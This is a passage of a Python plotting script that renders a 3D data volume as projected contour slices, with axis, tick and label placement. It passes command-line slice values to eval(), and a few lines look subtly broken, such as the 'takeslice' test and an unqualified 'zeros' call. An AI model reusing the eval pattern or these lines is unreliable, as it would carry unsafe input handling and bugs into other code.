argparse.ArgumentParser(description='''\n purpose:\n Plot a 3D array as a full or cropped volume of contours.\n ''',\n formatter_class=RawTextHelpFormatter)\nparser = getarg(parser, program)\nargs = parser.parse_args()\n\n# input\ndata, n1, n2, n3, dmin, dmax = read_array(args, which='fore', dim=3)\nmask, _, _, _, _, _ = read_array(args, which='mask', dim=3)\nif mask is not None:\n data = data * mask\n\nd1 = float(args.d1)\nd2 = float(args.d2)\nd3 = float(args.d3)\n\n## limit of axis\nfrom module_range import *\nsp1beg, sp1end, x1beg, x1end, n1beg, n1end = set_range(args.o1, n1, d1, args.x1beg, args.x1end)\nsp2beg, sp2end, x2beg, x2end, n2beg, n2end = set_range(args.o2, n2, d2, args.x2beg, args.x2end)\nsp3beg, sp3end, x3beg, x3end, n3beg, n3end = set_range(args.o3, n3, d3, args.x3beg, args.x3end)\n\nn1 = n1end - n1beg + 1\nn2 = n2end - n2beg + 1\nn3 = n3end - n3beg + 1\n\n## set slice\n# axis 1\nif args.slice1 is None:\n sl1 = (x1end + x1beg) / 2.0\nelse:\n sl1 = eval(args.slice1)\n\n# axis 2\nif args.slice2 is None:\n sl2 = (x2end + x2beg) / 2.0\nelse:\n sl2 = eval(args.slice2)\n\n# axis 3\nif args.slice3 is None:\n sl3 = (x3end + x3beg) / 2.0\nelse:\n sl3 = eval(args.slice3)\n\n# slice index\nslice1 = int(round((sl1 - sp1beg) / d1))\nslice2 = int(round((sl2 - sp2beg) / d2))\nslice3 = int(round((sl3 - sp3beg) / d3))\nif slice1 <= 0 or slice1 >= n1end:\n print('error: slice 1 selection error')\n exit()\nif slice2 <= 0 or slice2 >= n2end:\n print('error: slice 2 selection error')\n exit()\nif slice3 <= 0 or slice3 >= n3end:\n print('error: slice 3 selection error')\n exit()\n\n# recalculate slice position\nsl1 = x1beg + (slice1 - n1beg) * d1\nsl2 = x2beg + (slice2 - n2beg) * d2\nsl3 = x3beg + (slice3 - n3beg) * d3\n\ntakeslice = (args.slice1) != 0 or len(args.slice2) != 0 or len(args.slice3 is not None)\n\n# select data based on angle\nif args.angle is None:\n angle1 = 40.0\n angle2 = 10.0\nelse:\n angles = args.angle[0].split(',')\n if len(angles) == 1:\n angle1 = float(args.angle[0])\n angle2 = 0.0\n if len(angles) == 2:\n angle1 = float(angles[0])\n angle2 = float(angles[1])\n\n# check angle ranges\noctant = args.octant\nif not (octant in ['--+', '---', '-+-', '-++']):\n print('error: octant should be one of --+, ---, -+-, -++')\n exit()\nif angle1 < 0 or angle1 > 90 or angle2 < 0 or angle2 > 90:\n print('error: angles should be in [0,90]')\n exit()\n\n# reassign angle\nangles = [angle1, angle2]\noctant_1 = (octant == '--+')\noctant_2 = (octant == '---')\noctant_3 = (octant == '-+-')\noctant_4 = (octant == '-++')\n\nif octant_1: # --+\n\n # note the global index of slices\n # for different view angles, the indices are different\n\n # slice data\n # slice xy\n data12 = data[n1beg:slice1 + 1, n2beg:slice2 + 1, slice3]\n if args.norm == 'log': data12 = np.log10(data12)\n\n # slice xz\n data13 = data[n1beg:slice1 + 1, slice2, slice3:n3end]\n if args.norm == 'log': data13 = np.log10(data13)\n\n # slice yz\n data23 = data[slice1, n2beg:slice2 + 1, slice3:n3end]\n if args.norm == 'log': data23 = np.log10(data23)\n\n # face data\n # slice xy\n fdata12 = data[n1beg:n1end, n2beg:n2end, n3end - 1]\n if args.norm == 'log': fdata12 = np.log10(fdata12)\n\n # slice xz\n fdata13 = data[n1beg:n1end, n2beg, n3beg:n3end]\n if args.norm == 'log': fdata13 = np.log10(fdata13)\n\n # slice yz\n fdata23 = data[n1beg, n2beg:n2end, n3beg:n3end]\n if args.norm == 'log': fdata23 = np.log10(fdata23)\n\n # mask array with nan\n if takeslice:\n mask = np.zeros([n1, n2, n3])\n mask[n1beg:slice1, n2beg:slice2, slice3 + 1:n3end] = 1\n mask12 = mask[n1beg:n1end, n2beg:n2end, n3end - 1]\n mask13 = mask[n1beg:n1end, n2beg, n3beg:n3end]\n mask23 = mask[n1beg, n2beg:n2end, n3beg:n3end]\n else:\n mask = []\n mask12 = []\n mask13 = []\n mask23 = []\n\nif octant_2: # ---\n\n # slice data\n # slice xy\n data12 = data[n1beg:slice1 + 1, n2beg:slice2 + 1, slice3]\n if args.norm == 'log': data12 = np.log10(data12)\n\n # slice xz\n data13 = data[n1beg:slice1 + 1, slice2, n3beg:slice3 + 1]\n if args.norm == 'log': data13 = np.log10(data13)\n\n # slice yz\n data23 = data[slice1, n2beg:slice2 + 1, n3beg:slice3 + 1]\n if args.norm == 'log': data23 = np.log10(data23)\n\n # face data\n # slice xy\n fdata12 = data[n1beg:n1end, n2beg:n2end, n3beg]\n if args.norm == 'log': fdata12 = np.log10(fdata12)\n\n # slice xz\n fdata13 = data[n1beg:n1end, n2beg, n3beg:n3end]\n if args.norm == 'log': fdata13 = np.log10(fdata13)\n\n # slice yz\n fdata23 = data[n1beg, n2beg:n2end, n3beg:n3end]\n if args.norm == 'log': fdata23 = np.log10(fdata23)\n\n if takeslice:\n mask = np.zeros([n1, n2, n3])\n mask[n1beg:slice1, n2beg:slice2, n3beg:slice3] = 1\n mask12 = mask[n1beg:n1end, n2beg:n2end, n3beg]\n mask13 = mask[n1beg:n1end, n2beg, n3beg:n3end]\n mask23 = mask[n1beg, n2beg:n2end, n3beg:n3end]\n else:\n mask = []\n mask12 = []\n mask13 = []\n mask23 = []\n\nif octant_3: # -+-\n\n # slice data\n # slice xy\n data12 = data[n1beg:slice1 + 1, slice2:n2end, slice3]\n if args.norm == 'log': data12 = np.log10(data12)\n\n # slice xz\n data13 = data[n1beg:slice1 + 1, slice2, n3beg:slice3 + 1]\n if args.norm == 'log': data13 = np.log10(data13)\n\n # slice yz\n data23 = data[slice1, slice2:n2end, n3beg:slice3 + 1]\n if args.norm == 'log': data23 = np.log10(data23)\n\n # face data\n # slice xy\n fdata12 = data[n1beg:n1end, n2beg:n2end, n3beg]\n if args.norm == 'log': fdata12 = np.log10(fdata12)\n\n # slice xz\n fdata13 = data[n1beg:n1end, n2end - 1, n3beg:n3end]\n if args.norm == 'log': fdata13 = np.log10(fdata13)\n\n # slice yz\n fdata23 = data[n1beg, n2beg:n2end, n3beg:n3end]\n if args.norm == 'log': fdata23 = np.log10(fdata23)\n\n if takeslice:\n mask = np.zeros([n1, n2, n3])\n mask[n1beg:slice1, slice2 + 1:n2end, n3beg:slice3] = 1\n mask12 = mask[n1beg:n1end, n2beg:n2end, n3beg]\n mask13 = mask[n1beg:n1end, n2end - 1, n3beg:n3end]\n mask23 = mask[n1beg, n2beg:n2end, n3beg:n3end]\n else:\n mask = []\n mask12 = []\n mask13 = []\n mask23 = []\n\nif octant_4: # -++\n\n # slice data\n # slice xy\n data12 = data[n1beg:slice1 + 1, slice2:n2end, slice3]\n if args.norm == 'log': data12 = np.log10(data12)\n\n # slice xz\n data13 = data[n1beg:slice1 + 1, slice2, slice3:n3end]\n if args.norm == 'log': data13 = np.log10(data13)\n\n # slice yz\n data23 = data[slice1, slice2:n2end, slice3:n3end]\n if args.norm == 'log': data23 = np.log10(data23)\n\n # face data\n # slice xy\n fdata12 = data[n1beg:n1end, n2beg:n2end, n3end - 1]\n if args.norm == 'log': fdata12 = np.log10(fdata12)\n\n # slice xz\n fdata13 = data[n1beg:n1end, n2end - 1, n3beg:n3end]\n if args.norm == 'log': fdata13 = np.log10(fdata13)\n\n # slice yz\n fdata23 = data[n1beg, n2beg:n2end, n3beg:n3end]\n if args.norm == 'log': fdata23 = np.log10(fdata23)\n\n if takeslice:\n mask = zeros([n1, n2, n3])\n mask[n1beg:slice1, slice2 + 1:n2end, slice3 + 1:n3end] = 1\n mask12 = mask[n1beg:n1end, n2beg:n2end, n3end - 1]\n mask13 = mask[n1beg:n1end, n2end - 1, n3beg:n3end]\n mask23 = mask[n1beg, n2beg:n2end, n3beg:n3end]\n else:\n mask = []\n mask12 = []\n mask13 = []\n mask23 = []\n\n## set figure size\n# inch per point\nipp = 0.0138889\n\n# default longest axis of three figures is 5 inch\nfigbase = 5.0\ngolden_ratio = 1.0 / 1.61803398875\nnmax = max(n1end - n1beg, n2end - n2beg, n3end - n3beg)\n\n# if figure width/height or vice versa larger than 6 then use golden ratio\nlimit = 6.0\n\nif args.size1 is None:\n ratio = float(n1end - n1beg) / nmax\n if ratio < 1.0 / limit:\n ratio = golden_ratio\n size1 = figbase * ratio\nelse:\n size1 = float(args.size1)\n\nif args.size2 is None:\n ratio = float(n2end - n2beg) / nmax\n if ratio < 1.0 / limit:\n ratio = golden_ratio\n size2 = figbase * ratio\nelse:\n size2 = float(args.size2)\n\nif args.size3 is None:\n ratio = float(n3end - n3beg) / nmax\n if ratio < 1.0 / limit:\n ratio = golden_ratio\n size3 = figbase * ratio\nelse:\n size3 = float(args.size3)\n\n## set font\nfrom module_font import *\nfont, fontbold = set_font(args)\n\n\n## projection operation\n# axonometric projection\ndef isometric_projection(x, y, z, angles):\n alpha = angles[0]\n beta = angles[1]\n bx = x * np.cos(alpha * np.pi / 180.0) - y * np.cos(beta * np.pi / 180.0)\n by = z + x * np.sin(alpha * np.pi / 180.0) + y * np.sin(beta * np.pi / 180.0)\n return bx, by\n\n\n## plot contour and axis on deformed rectangular mesh\ndef project_contour(args, ax, data, px, py, colormap, cmin, cmax, font, mask=[]):\n\n # determine input dimension\n n1, n2 = data.shape\n\n # generate shape functions\n s1 = np.linspace(1, 0, n1)\n s2 = np.linspace(0, 1, n1)\n s3 = np.linspace(1, 0, n2)\n s4 = np.linspace(0, 1, n2)\n\n shapes = [[[s1[i] * s3[j], s2[i] * s3[j], s2[i] * s4[j], s1[i] * s4[j]] for j in range(0, n2)]\n for i in range(0, n1)]\n\n # triangulartion\n nnx = np.zeros([n1, n2])\n nny = np.zeros([n1, n2])\n for i in range(0, n1):\n for j in range(0, n2):\n nnx[i, j] = sum(shapes[i][j] * np.asarray(px))\n nny[i, j] = sum(shapes[i][j] * np.asarray(py))\n nnx = nnx.flatten()\n nny = nny.flatten()\n data = data.flatten()\n mesh = mplt.tri.Triangulation(nnx, nny)\n\n # if automatically determine contour levels\n mcontour = int(args.mcontour) + 1\n if mcontour <= 0:\n print('sublevel contour specification error')\n exit()\n\n # linear data norm\n if args.norm == 'linear':\n\n if args.contours is None:\n\n if args.contourlevel is None:\n ctrd = nice((cmax - cmin) / 10.0)\n else:\n ctrd = float(args.contourlevel)\n\n if args.contourbeg is None:\n ctrbeg = nice(cmin)\n base = 0.5\n nb = 0\n while nb <= 10 and ctrbeg > cmin + ctrd:\n base = base / 10.0\n ctrbeg = nice(cmin, base)\n nb = nb + 1\n else:\n ctrbeg = float(args.contourbeg)\n if args.contourend is None:\n ctrend = cmax\n else:\n ctrend = float(args.contourend)\n\n # contour levels\n levels = np.arange(ctrbeg, ctrend + 0.5 * abs(ctrd) / float(mcontour), ctrd / float(mcontour))\n levels = np.append(levels, levels[-1])\n\n # if explicitly specify contour levels\n else:\n\n # major levels\n levels = args.contours[0].split(',')\n for i in range(0, size(levels)):\n levels[i] = float(levels[i])\n\n # calculate minor levels\n tls = levels[0]\n for i in range(0, size(levels) - 1):\n tls = np.append(tls, np.linspace(levels[int(i)], levels[int(i) + 1], mcontour + 1))\n levels = unique(tls)\n levels = np.append(levels, levels[-1])\n\n # log data norm\n if args.norm == 'log':\n\n if args.contours is None:\n\n if args.contourbeg is None:\n ctrbeg = np.floor(cmin)\n else:\n ctrbeg = float(args.contourbeg)\n if args.contourend is None:\n ctrend = np.ceil(cmax) + 1\n else:\n ctrend = float(args.contourend)\n\n if args.contourlevel is None:\n ctrd = max(1, int((ctrbeg - ctrend) / 5.0))\n else:\n ctrd = int(args.contourlevel)\n\n # contour levels\n levels = np.arange(ctrbeg, ctrend + ctrd, ctrd)\n levels = np.append(levels, levels[-1] + 1)\n nl = len(levels)\n mlevels = []\n for i in range(0, nl - 1):\n mlevels = np.append(\n mlevels, np.log10(np.linspace(10**levels[i], 10**levels[i + 1], args.mcontour + 2)))\n levels = np.unique(mlevels)\n levels = np.append(levels, levels[-1])\n\n # if explicitly specify contour levels\n else:\n\n # major levels\n levels = args.contours[0].split(',')\n for i in range(0, size(levels)):\n levels[i] = float(levels[i])\n\n # calculate minor levels\n tls = levels[0]\n for i in range(0, size(levels) - 1):\n tls = np.append(\n tls, np.log10(np.linspace(10**levels[int(i)], 10**levels[int(i) + 1], mcontour + 1)))\n levels = unique(tls)\n levels = np.append(levels, levels[-1])\n\n # contour font size\n if args.clabelsize is None:\n clabelsize = min(float(args.label1size), float(args.label2size)) - 1\n else:\n clabelsize = float(args.clabelsize)\n\n # contour widths\n if args.mcontourwidth is None:\n mw = 0.25 * float(args.contourwidth)\n else:\n mw = float(args.mcontourwidth)\n\n lw = np.asarray([mw for i in range(0, size(levels))])\n lw[0:-1:mcontour] = float(args.contourwidth)\n\n ls = np.array([args.mcontourstyle for i in range(0, size(levels))])\n ls[0:-1:mcontour] = args.contourstyle\n\n lc0 = args.contourcolor[0].split(',')\n lc = ['k' for i in range(0, size(levels))]\n lc[0:size(lc0)] = lc0\n\n # show filled contours if necessary\n # fill contours use full mesh since no need to worry about overlap\n if args.contourfill:\n if args.norm == 'linear':\n cf = ax.tricontourf(mesh,\n data,\n levels[0:size(levels) - 1],\n cmap=colormap,\n antialiased=True,\n extend='both')\n if args.norm == 'log':\n from matplotlib.colors import LogNorm\n cf = ax.tricontourf(mesh,\n data,\n levels[0:size(levels) - 1],\n cmap=colormap,\n antialiased=True,\n norm=LogNorm(cmin, cmax))\n for l in cf.collections:\n l.set_edgecolor('face')\n l.set_linewidth(0.025)\n\n # show ordinary contours by default\n # triangular mesh mask\n if len(mask) > 0:\n mask = mask.flatten()\n mask = mask[mesh.triangles].mean(axis=1)\n mask = np.where(mask > 0.33333333, 1, 0)\n mesh.set_mask(mask)\n\n # contours use masked mesh since otherwise overlap\n cs = ax.tricontour(mesh,\n data,\n levels[0:size(levels) - 1],\n colors=lc,\n linewidths=lw,\n linestyles=ls,\n antialiased=True)\n # inline=True,\n\n if clabelsize != 0:\n\n # choose label levels\n lvl = cs.levels[::mcontour]\n\n # set format\n clabels = ['' for i in range(0, size(lvl))]\n if args.norm == 'linear':\n for i in range(0, size(lvl)):\n if lvl[i] != 0 and (abs(lvl[i]) < 1.0e-3 or abs(lvl[i]) > 1.0e3):\n scalar = int(floor(log10(abs(lvl[i]))))\n cscale = pow(10, scalar)\n clabels[i] = ('%f' % (lvl[i] / cscale)\n ).rstrip('0').rstrip('.') + r'$\\mathregular{\\times 10^{%i}}$' % scalar\n else:\n clabels[i] = ('%f' % (lvl[i])).rstrip('0').rstrip('.')\n\n if args.norm == 'log':\n for i in range(0, size(lvl)):\n clabels[i] = r'$\\mathregular{10^{%i}}$' % (lvl[i])\n\n fmt = {}\n for l, s in zip(cs.levels[::mcontour], clabels):\n fmt[l] = s\n\n # place contour labels\n clabels = ax.clabel(cs, cs.levels[::mcontour], inline=True, fmt=fmt,\n fontsize=clabelsize) #, fontproperties=font)\n # ax.get_label.set_fontproperties(font)\n # ax.get_label.set_size(font)\n for txt in clabels:\n txt.set_fontproperties(font)\n txt.set_fontsize(clabelsize)\n txt.set_color(args.clabelcolor)\n if args.clabelbackcolor is not None:\n txt.set_backgroundcolor(args.clabelbackcolor)\n\n\n## plot image and axis on deformed rectangular mesh\ndef project_image(ax, data, px, py, colormap, cmin, cmax):\n\n # determine input dimension\n n1, n2 = data.shape\n n1 = n1 + 1\n n2 = n2 + 1\n\n # generate shape functions\n s1 = np.linspace(1, 0, n1)\n s2 = np.linspace(0, 1, n1)\n s3 = np.linspace(1, 0, n2)\n s4 = np.linspace(0, 1, n2)\n\n shapes = [[[s1[i] * s3[j], s2[i] * s3[j], s2[i] * s4[j], s1[i] * s4[j]] for j in range(0, n2)]\n for i in range(0, n1)]\n\n # do projection\n nnx = [[sum(shapes[i][j] * np.asarray(px)) for j in range(0, n2)] for i in range(0, n1)]\n nny = [[sum(shapes[i][j] * np.asarray(py)) for j in range(0, n2)] for i in range(0, n1)]\n\n # pcolor fast is the fastest way, using polygon collections is slow\n im = ax.pcolorfast(nnx, nny, data, linewidth=0, edgecolor='none', antialiased=True)\n im.set_cmap(colormap)\n im.set_clim(cmin, cmax)\n im.set_rasterized(True)\n\n\nfrom module_utility import *\n\n\ndef project_axis(ax, p1x, p1y, p2x, p2y, ticks, tickbeg, tickend, tickd, mtick, xbeg, xend, ns, d, font,\n tick_major_len, tick_major_width, tick_minor_len, tick_minor_width, axislen, tick_orient,\n ticklabel_orient, tick_size, label, label_orient, label_size, label_pad, tick_format):\n\n # regular ticks\n if ticks is None:\n\n # major tick interval\n if tickd is None:\n tick_interval = nice((xend - xbeg) / 5.0)\n if tick_interval == 0:\n tick_interval = 1.0e10\n else:\n tick_interval = float(tickd)\n\n # tick begin location\n if tickbeg is None:\n tick_beg = nice(xbeg)\n base = 0.5\n nb = 0\n if tick_interval > 0:\n while nb <= 10 and tick_beg > xbeg + tick_interval:\n base = base / 10.0\n tick_beg = nice(xbeg, base)\n nb = nb + 1\n else:\n while nb <= 10 and tick_beg < xbeg + tick_interval:\n base = base / 10.0\n tick_beg = nice(xbeg, base)\n nb = nb + 1\n else:\n tick_beg = float(tickbeg)\n\n # tick end location\n if tickend is None:\n tick_end = tick_beg + (round((xend - xbeg) / tick_interval) + 2) * tick_interval\n if tick_interval > 0:\n while tick_end < xend:\n tick_end = tick_end + abs(tick_interval)\n else:\n while tick_end > xend:\n tick_end = tick_end - abs(tick_interval)\n else:\n tick_end = float(tickend)\n\n # regular major and minor tick locations\n tick = np.arange(tick_beg, tick_end + 0.1 * abs(tick_interval), tick_interval)\n minor_tick_interval = tick_interval / (mtick + 1.0)\n minor_tick = np.arange(tick_beg, tick_end + 0.1 * abs(minor_tick_interval), minor_tick_interval)\n\n # some ticks might out of axis range\n if d > 0:\n tick = np.asarray([i for i in tick if i >= xbeg and i <= xend])\n minor_tick = np.asarray([i for i in minor_tick if i >= xbeg and i <= xend and (not i in tick)])\n if d < 0:\n tick = np.asarray([i for i in tick if i <= xbeg and i >= xend])\n minor_tick = np.asarray([i for i in minor_tick if i <= xbeg and i >= xend and (not i in tick)])\n\n # linearly scale the ticks to figure canvas\n if ns == 1:\n print('error: contour plot requires at least two points')\n if ns == 2:\n # if only one sample point, then tick location is 0.5\n tick_location = np.asarray([0, axislen])\n ntick = 2\n if ns > 2:\n # if multiple sample points, then scale to apparent axis length\n # !! for contour plot remove the 0.5*d extra length\n # tick_location=(tick-xbeg+0.5*d)/((ns-1)*d)*axislen\n tick_location = (tick - xbeg) / ((ns - 2) * d) * axislen\n minor_tick_location = (minor_tick - xbeg) / ((ns - 2) * d) * axislen\n t = tick_location\n\n # set major tick location and labels, note some major ticks might be out of axis range\n tl = []\n tick_label = []\n for i in range(0, len(tick)):\n if tick_location[i] >= 0 and tick_location[i] <= axislen + 1.0e-10:\n tl.append(tick_location[i])\n if tick_format == 'sci' or tick_format == 'plain':\n tick_label.append(('%f' % tick[i]).rstrip('0').rstrip('.'))\n else:\n tick_label.append((tick_format % tick[i]))\n tick_location = tl\n\n # irregular ticks\n else:\n\n # get contents from user-specified ticks\n ticks = ticks[0].split(':')\n location = [0 for i in range(0, len(ticks))]\n label = ['' for i in range(0, len(ticks))]\n\n # set tick locations\n for i in range(0, len(ticks)):\n t = ticks[i].split(',')\n # !!\n # location[i]=(float(t[0])+0.5*d)/((ns-1)*d)*axislen\n location[i] = (float(t[0])) / ((ns - 2) * d) * axislen\n label[i] = t[1]\n\n # sort according to tick location\n yx = list(zip(location, label))\n yx.sort()\n tick_location = [location for location, label in yx]\n tick_label = [label for location, label in yx]\n\n # minor ticks\n mtick = mtick + 1\n minor_tick_location = np.linspace(tick_location[0], tick_location[1], mtick + 1)\n minor_tick_location = minor_tick_location[1:mtick]\n for i in range(1, len(tick_location) - 1):\n t = np.linspace(tick_location[i], tick_location[i + 1], mtick + 1)\n minor_tick_location = np.append(minor_tick_location, t[1:mtick])\n\n # major ticks\n # projection of ticks to target position\n # !! ensure no zero encountered\n if tick_location[-1] == axislen:\n tick_location[-1] = axislen - 1.0e-10\n tx = [p1x + i * (p2x - p1x) / axislen for i in tick_location]\n ty = [p1y + i * (p2y - p1y) / axislen for i in tick_location]\n\n # in the following, the ticks are assumed to be always perpendicular with\n # the axis, whatever the pointing of the axis is\n if tick_orient == 'counterclock':\n # outward pointing -- 90 degree counterclockwise\n # vector is (x1,y1) ----> (x2,y2)\n # outward means the tick should counterclockwise rotate this vector to\n # get ticks\n tx2 = -(p2y - ty)\n ty2 = p2x - tx\n\n if tick_orient == 'clock':\n # inward pointing -- 90 degree clockwise\n # vector is (x1,y1) ----> (x2,y2)\n # inward means the tick should clockwise rotate this vector to\n # get ticks\n tx2 = p2y - ty\n ty2 = -(p2x - tx)\n\n # direct = will cause txx/tyy always equal to tx2/ty2\n txx = [i for i in tx2]\n tyy = [i for i in ty2]\n\n ticklen = tick_major_len * ipp\n for i in range(0, len(tick_location)):\n epx = tx[i] + tx2[i] / sqrt(tx2[i]**2 + ty2[i]**2) * ticklen\n epy = ty[i] + ty2[i] / sqrt(tx2[i]**2 + ty2[i]**2) * ticklen\n tx2[i] = epx\n ty2[i] = epy\n\n # form lines\n majortick = []\n e1 = list(zip(tx, ty))\n e2 = list(zip(tx2, ty2))\n for i in range(0, len(tick_location)):\n majortick.append([e1[i], e2[i]])\n\n majortick = LineCollection(majortick, linewidths=tick_major_width, colors='k')\n ax.add_collection(majortick)\n\n # get center location of the axis\n hx = 0.5 * (p1x + p2x)\n hy = 0.5 * (p1y + p2y)\n\n # get normal vector starting from center location of the axis\n if tick_orient == 'counterclock':\n # outward pointing -- 90 degree counterclockwise\n hx2 = -(p2y - hy)\n hy2 = p2x - hx\n if tick_orient == 'clock':\n # inward pointing -- 90 degree clockwise\n hx2 = p2y - hy\n hy2 = -(p2x - hx)\n\n # angle of axis [-180,180]\n axis_angle = np.arctan2(p2y - p1y, p2x - p1x + 1.0e-10) * 180.0 / np.pi\n\n # angle of tick label\n if ticklabel_orient == 'positive':\n ticklabel_angle = axis_angle\n if ticklabel_orient == 'negative':\n ticklabel_angle = axis_angle - 180.0\n if ticklabel_orient == 'counterclock':\n ticklabel_angle = axis_angle + 90.0\n if ticklabel_orient == 'clock':\n ticklabel_angle = axis_angle - 90.0\n\n # maximum tick label length\n ticklabellen = [0 for i in range(0, len(tick_location))]\n for i in range(0, len(tick_location)):\n ticklines = tick_label[i].split('\\n')\n if ticklabel_orient == 'positive' or ticklabel_orient == 'negative':\n ticklabellen[i] = len(ticklines) * tick_size * ipp\n if ticklabel_orient == 'counterclock' or ticklabel_orient == 'clock':\n ticklabellen[i] = 0.6 * max([len(j) for j in ticklines]) * tick_size * ipp\n maxlen = max(ticklabellen)\n\n # tick label alignment\n pad = ticklen + 0.1\n if ticklabel_orient == 'positive' or ticklabel_orient == 'negative':\n ha = 'center'\n va = 'center'\n pad = pad + 0.5 * tick_size * ipp\n if ticklabel_orient == 'clock':\n if tick_orient == 'clock':\n ha = 'left'\n va = 'center'\n if tick_orient == 'counterclock':\n ha = 'right'\n va = 'center'\n if ticklabel_orient == 'counterclock':\n if tick_orient == 'clock':\n ha = 'right'\n va = 'center'\n if tick_orient == 'counterclock':\n ha = 'left'\n va = 'center'\n\n # tick labels\n for i in range(0, len(tick_location)):\n epx = tx[i] + txx[i] / sqrt(txx[i]**2 + tyy[i]**2) * pad\n epy = ty[i] + tyy[i] / sqrt(txx[i]**2 + tyy[i]**2) * pad\n ax.text(epx,\n epy,\n tick_label[i],\n ha=ha,\n va=va,\n rotation=ticklabel_angle,\n fontproperties=font,\n size=tick_size)\n\n # angle of axis label\n if label_orient == 'positive':\n label_angle = axis_angle\n if label_orient == 'negative':\n label_angle = axis_angle - 180.0\n if label_orient == 'counterclock':\n label_angle = axis_angle + 90.0\n if label_orient == 'clock':\n label_angle = axis_angle - 90.0\n\n # axis label alignment\n pad = ticklen + 0.05 + maxlen + 0.1\n if label_orient == 'positive' or label_orient == 'negative':\n ha = 'center'\n va = 'center'\n pad = pad + 0.6 * label_size * ipp + label_pad\n if label_orient == 'clock':\n ha = 'left'\n va = 'center'\n pad = pad + label_pad\n if label_orient == 'counterclock':\n ha = 'right'\n va = 'center'\n pad = pad + label_pad\n\n # maximum axis label length\n labellines = label.split('\\n')\n if ticklabel_orient == 'positive' or ticklabel_orient == 'negative':\n labellen = len(labellines) * label_size * ipp\n if ticklabel_orient == 'counterclock' or ticklabel_orient == 'clock':\n labellen = 0.6 * max([len(i) for i in labellines]) * label_size * ipp\n\n # axis label position\n labelx = hx + hx2 / sqrt(hx2**2 + hy2**2) * pad\n labely = hy + hy2 / sqrt(hx2**2 + hy2**2) * pad\n if label is not None:\n ax.text(labelx,\n labely,\n label,\n ha=ha,\n va=va,\n rotation=label_angle,\n fontproperties=font,\n size=label_size)\n\n # minor tick locations\n # projection of ticks to target position\n tx = [p1x + i * (p2x - p1x) / axislen for i in minor_tick_location]\n ty = [p1y + i * (p2y - p1y) / axislen for i in minor_tick_location]\n\n if tick_orient == 'counterclock':\n # outward pointing -- 90 degree counterclockwise\n tx2 = -(p2y - ty)\n ty2 = p2x - tx\n\n if tick_orient == 'clock':\n # inward pointing -- 90 degree clockwise\n tx2 = p2y - ty\n ty2 = -(p2x - tx)\n\n ticklen = tick_minor_len * ipp\n for i in range(0, len(minor_tick_location)):\n epx = tx[i] + tx2[i] / sqrt(tx2[i]**2 + ty2[i]**2) * ticklen\n epy = ty[i] + ty2[i] / sqrt(tx2[i]**2 + ty2[i]**2) * ticklen\n tx2[i] = epx\n ty2[i] = epy\n\n # form lines\n minortick = []\n e1 = list(zip(tx, ty))\n e2 = list(zip(tx2, ty2))\n for i in range(0, len(minor_tick_location)):\n minortick.append([e1[i], e2[i]])\n\n minortick = LineCollection(minortick, linewidths=tick_minor_width, colors='k')\n ax.add_collection(minortick)\n\n\n## color converter\ndef cc(arg):\n return colorConverter.to_rgba(arg)\n\n\n## compose volume\nif octant_1:\n\n angle1 = angle1\n angles = [angle1, angle2]\n\n #\n # A sketch of cavalier projection. \n # The relative point positions also apply to isometric projection\n #\n #\n # 8 *------------------------* 6\n # /. /|\n # / . / |\n # / . #............# |\n # / . .: : |\n # / . . : : |\n # 2 / *(7) . : (4) : * 5 (size2)\n # *-----------# #............# /\n # | size1 : . . /\n # | :. . /\n # | #............# /\n # | | /\n # | |/ ) angle\n # *------------------------* ----\n # 1 3 (size3)\n #\n\n # vertices positions for faces\n p1x, p1y = isometric_projection(0, size3, 0, angles)\n p2x, p2y = isometric_projection(0, size3, size1, angles)\n p3x, p3y = isometric_projection(0, 0, 0, angles)\n p4x, p4y = isometric_projection(0, 0, size1, angles)\n p5x, p5y = isometric_projection(size2, 0, 0, angles)\n p6x, p6y = isometric_projection(size2, 0, size1, angles)\n p7x, p7y = isometric_projection(size2, size3, 0, angles)\n p8x, p8y = isometric_projection(size2, size3, size1, angles)\n\n # set slice cut plane\n if x1end != x1beg:\n scale1 = size1 / (x1end - x1beg)\n else:\n scale1 = 1.0e2\n if x2end != x2beg:\n scale2 = size2 / (x2end - x2beg)\n else:\n scale2 = 1.0e2\n if x3end != x3beg:\n scale3 = size3 / (x3end - x3beg)\n else:\n scale3 = 1.0e2\n sl1 = size1 - (sl1 - x1beg) / ((n1end - n1beg - 1) * d1) * size1\n sl2 = (sl2 - x2beg) / ((n2end - n2beg - 1) * d2) * size2\n sl3 = size3 - (sl3 - x3beg) / ((n3end - n3beg - 1) * d3) * size3\n\n # vertices positions for slices\n q1x, q1y = isometric_projection(0, sl3, sl1, angles)\n q2x, q2y = isometric_projection(0, sl3, size1, angles)\n q3x, q3y = isometric_projection(0, 0, sl1, angles)\n q4x, q4y = isometric_projection(0, 0, size1, angles)\n q5x, q5y = isometric_projection(sl2, 0, sl1, angles)\n q6x, q6y = isometric_projection(sl2, 0, size1, angles)\n q7x, q7y = isometric_projection(sl2, sl3, sl1, angles)\n q8x, q8y = isometric_projection(sl2, sl3, size1, angles)\n\n # face 13 coordinates\n face13x = [p2x, p1x, p3x, p4x]\n face13y = [p2y, p1y, p3y, p4y]\n\n # face 23 coordinates\n face23x = [p2x, p8x, p6x, p4x]\n face23y = [p2y, p8y, p6y, p4y]\n\n # face 12 coordinates\n face12x = [p4x, p3x, p5x, p6x]\n face12y = [p4y, p3y, p5y, p6y]\n\n # slice 13 coordinates\n slice13x = [q8x, q7x, q5x, q6x]\n slice13y = [q8y, q7y, q5y, q6y]\n\n # slice 23 coordinates\n slice23x = [q1x, q7x, q5x, q3x]\n slice23y = [q1y, q7y, q5y, q3y]\n\n # slice 12 coordinates\n slice12x = [q2x, q1x, q7x, q8x]\n slice12y = [q2y, q1y, q7y, q8y]\n\n # axis limits\n xlim = [p1x - 0.01, p5x + 0.01]\n ylim = [p3y - 0.01, p8y + 0.01]\n\n # frames\n if args.frametop:\n topline = [[(p2x, p2y), (p8x, p8y), (p6x, p6y)]]\n topline = LineCollection(topline, color='k')\n topline2 = [[(q2x, q2y), (q8x, q8y), (q6x, q6y)]]\n topline2 = LineCollection(topline2, color='k')\n if args.framebottom:\n bottomline = [[(p1x, p1y), (p3x, p3y), (p5x, p5y)]]\n bottomline = LineCollection(bottomline, color='k')\n bottomline2 = [[(q1x, q1y), (q3x, q3y), (q5x, q5y)]]\n bottomline2 = LineCollection(bottomline2, color='k')\n if args.frameleft:\n leftline = [[(p1x, p1y), (p2x, p2y)]]\n leftline = LineCollection(leftline, color='k')\n leftline2 = [[(q1x, q1y), (q2x, q2y)]]\n leftline2 = LineCollection(leftline2, color='k')\n if args.frameright:\n rightline = [[(p5x, p5y), (p6x, p6y)]]\n rightline = 